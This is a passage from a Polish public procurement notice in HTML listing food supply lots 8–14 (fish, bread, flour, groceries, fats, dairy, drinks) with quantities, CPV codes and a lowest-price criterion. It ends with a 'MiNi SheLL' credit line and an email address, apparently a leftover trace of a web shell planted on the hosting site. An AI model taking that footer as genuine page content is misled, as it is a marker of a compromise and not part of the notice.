mielonka konserwowa	kg	50
mielonka śniadaniowa lub równowazna	kg	40
mięso gulaszowe	kg	50
mortadela	kg	50
ogonówka 	kg	60
parówka w folii	kg	50
parówka wiedenska lub równowazna	kg	40
pasztet zapiekany	kg	15
pasztetowa  domowa lub równowazna	kg	50
polędwica drobiowa	kg	80
polędwica sopocka drobiowalub równowazna	kg	30
przysmak śniadaniowy 130g	szt	45
przysmak w konserwie lub równowazny	kg	25
salami rodzinne lub równowazne	kg	9
schab wiep b/k	kg	70
serdelki	kg	40
słonina	kg	6
smaczek konserwowy lub równowazny	kg	40
szynka konserwowa 	kg	60
szynka mielona	kg	45
szynka typu królewiecka mielo lub równowazna	kg	15
szynka wiep b/k	kg	30
szynka wieprzowa - wędlina	kg	30
turystyczna lub równowazna	szt	45
tyrolska lub równowazna	kg	35
tyrolska puszka 300g lub równowazna	szt	45
udka z kurczaka	kg	300
wątroba drobiowa z kurczaka	kg	50
wątroba wieprzowa	kg	40
żeberka wiep	kg	30
żołądki drobiowe	kg	30
żywiecka lub podobne	kg	60.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.13.11.10-9, 15.13.11.20-2.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 8 <b>NAZWA:</b> Zadanie nr 8 - ryby i przetwory konserwowe.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> filet z mintaja	kg	60
makrela wędzona	kg	25
matijas	kg	20
panga	kg	80
paprykarz 156g	szt	60
szprot w pomidorach	szt	50
śledź w pomidorach	szt	50.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.20.00.00-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 9 <b>NAZWA:</b> Zadanie nr 9 - produkty przemiału ziarna i skrobi - pieczywo.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> bułka tarta	kg	60
bułki 50g	szt	460
bułki hamburger	szt	140
bułki pszenne100g	szt	420
chleb krojony pszenny 0,6 kg	szt	5000
chleb ziarnisty 400g	szt	200
ciasta różne	kg	9
drożdżówki	szt	135
pączki 100g	szt	135
rogal 100g	szt	140.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.81.00.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 10 <b>NAZWA:</b> Zadanie nr 10 - produkty skrobi - mąka.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> kasza jęczm. Średnia	kg	40
kasza manna	kg	30
mąka pszenna typu 450	kg	120
mąka pszenna typu 500	kg	150
mąka ziemiaczna	kg	25
platki kukur. 500 g	szt	50
platki kukur.kakaowe 250g	szt	20
platki kukur.kakaowe 500g	szt	50
płatki kukurydz. 250G	szt	30
płatki typu  chocapic 500g	szt	20
ryż 1kg	kg	40
ryż w woreczkach 0,5kg	szt	50.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.80.00.00-6.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 11 <b>NAZWA:</b> Zadanie nr 11 - różne produkty spożywcze.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> barszcz czerwony- koncentrat 300ml 	szt	40
baton   	szt	45
baton czekoladowy nadziewany	szt	135
baton czekoladowy w opakowaniu	szt	90
bialy barszcz	szt	50
budyń 40g	szt	200
chrupki kukurydziane	szt	48
ciastka kruche	kg	14
ciastka typu wafelki	kg	14
ciastka typy pierniki	kg	14
ciastka w polewie	kg	14
cukier	kg	600
cukier puder  0,5 kg	szt	50
cukier waniliowy	szt	100
cukierki czekoladowe	kg	14
cukierki owocowe	kg	6
cukierki typu krówki	kg	9
cynamon 0,20g	szt	24
czekolada nadziewana	szt	135
czekolada pełnomleczna	szt	180
czekolada z orzechami	szt	48
czipsy 9g	szt	135
drożdże 100g	szt	40
galaretka owocowa	szt	150
hebata expres owocowa 25szt	szt	10
herbata expr. Mietowa 20szt	szt	5
herbata expres 100 szt	szt	100
herbata owoc.rozpusz gran.	szt	15
herbata zielona expre25szt	szt	20
jarzynka 200g	szt	80
kakao rozpuszczalne 300g	szt	80
kawa naturalna mielona 500g	szt	6
kawa rozpuszczalna naturalna	szt	5
kawa rozpuszczalna zboż typu inka	szt	25
Keczup 1 l	szt	5
keczup 500g 	szt	50
keczup pikantny 0.5 	szt	24
kisiel 38g	szt	200
krem czekoladowo orzechowy 200g	szt	40
krem czekoladowo orzechowy 400g	szt	35
krem czekoladowy 200g	szt	250
krem czekoladowy 400g	szt	60
kwasek cytrynowy 20g	szt	100
liść laurowy 12g	szt	40
lizak  serduszko	szt	270
lizak kulka	szt	45
Łazanki 0.5	szt	35
magi w plynie 1 l	szt	40
majeranek 150g	szt	8
majeranek 20g	szt	40
majonez   700g  	szt	20
majonez  400g 	szt	50
majonez 900g do sałatek	szt	16
makaron gniazda 1kg	szt	40
makaron nitki  0.5 kg	szt	50
makaron rurki 1 kg	szt	30
makaron spagetti 0,5kg	szt	70
makaron świderki 1kg	szt	50
mikołaj czekoladowy	szt	48
Miód naturalny 0,9 l	szt	8
miód sztuczny  5kg	szt	2
miód sztuczny 200g	szt	46
musztarda  Sarepska 180g	szt	36
musztrda tuba 0.5 l	szt	14
Ocet 10%	szt	20
paluszki solone 0,400g	szt	24
paluszki z sezamem 70g	szt	135
papryka mielona 20g	szt	60
paprykarz szczcz. 300G	szt	45
paprykarz szczeciń 131g	szt	96
pasztet 135g z pomidorami	szt	96
pasztet puszka 160g	szt	96
pieprz mielony 20g	szt	300
pieprz ziolowy 20g	szt	30
polewa do lodów 1 l	szt	5
polewa do lodów 250g	szt	8
proszek do pieczenia 0,20 g	szt	60
przyprawa do grilla 20g	szt	16
przyprawa do kurczaka 1 kg	szt	2
przyprawa do kurczaka 30g	szt	50
przyprawa do mięsa 30g  	szt	30
przyprawa gyros 30	szt	40
rosól drobiowy 1 kg	szt	5
rosół drobiowy kostki 60g 	szt	30
sos  bolones 0,500l	szt	20
sos do deserów 1 l	szt	10
sos do hamburgerow 1 l	szt	10
sos fix do spagetti 45g	szt	200
sos mix koper-zioł, włoski itp. 9g	szt	100
sos salatkowy mix 700g	szt	8
sos słodko-kwaśny  0,5	szt	48
sos sojowy 1l	szt	4
sól	kg	180
vegeta 200g	szt	80
wafelek b/polewy 	szt	230
wafelek w polewie	szt	92
wiórki kokosowe 200g	szt	30
zelatyna 50g	szt	30
zestaw świateczny (np.czelolada, baton, mikołaj)	szt	45
zestaw świąeczny(np. Czekolada, zajączek, baton)	szt	45
ziele angielskie 15g	szt	25
ziele angielskie 600g 	szt	2
zupki  chińska(ostra,łagodna rosołowa itp.)	szt	320
zupki chińska	szt	45
zurek w proszku 60g	szt	150
żurek w butelce 0,5l	szt	30.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.80.00.00-6.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 12 <b>NAZWA:</b> Zadanie nr 12- oleje i tłuszcze roślinne.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Margaryna  do pieczenia 250g	szt	50
margaryna z masłem 500g	szt	300
masło roślinne 200g	szt	45
olej 1l	szt	120
olej 3l	szt	20
oliwa z oliwek 1 l	szt	1
smalec	kg	3
smalec 200g	szt	50.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.43.00.00-1.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 13 <b>NAZWA:</b> Zadanie nr 13 - produkty mleczarskie.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> deser	szt	96
deser czekoladowo orzecgowy	szt	48
jogurt owocowy 150g	szt	830
jogurt pitny 200g	szt	230
jogurt z owocami 	szt	48
kefir 0,5l	szt	46
lody 1000g	szt	12
lody 100g	szt	92
masło śmietank. 200G	szt	1350
maślanka owocowa 0,5	szt	92
Mleko 3,2% 1l UHT	szt	700
ser edamski	kg	50
ser gouda	kg	50
ser morski	kg	25
ser salami	kg	50
ser top. krążek 140g	szt	120
ser topiony -kielbaski 100g	szt	70
ser twarogowy 200g	szt	100
ser twarogowy półtusty	kg	50
ser tylżycki	kg	50
ser wędzony	kg	12
ser złoty mazur	kg	25
serek grani 	szt	185
serek homogenizowany 150g	szt	230
serek kanapk. Twarożk. 125g	szt	300
serek twarożkowy w kubeczku 150g	szt	200
set topiony kostka 100g	kg	50
Smietana 30% 0,5l kubek	szt	30
Śmietana 12% - słodka 0,5l UHT	szt	40
Śmietana 18% 400ml - zakwaszana	szt	250.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.50.00.00-3.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 14 <b>NAZWA:</b> Zadanie nr 14 - napoje.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> napoje gazowane 1,5 l	szt	70
napoje niegazowane 1,5 l	szt	70
napój gazowany 2l	szt	14
napój n/g 2 l	szt	14
napój energet	szt	138
woda mineralna 0,5 gazowana	szt	144
woda 0,5 n/g 	szt	144
woda mineralna n/g 1,5 l 	szt	100
woda mineralna g 1,5 l 	szt	100.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.90.00.00-7.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com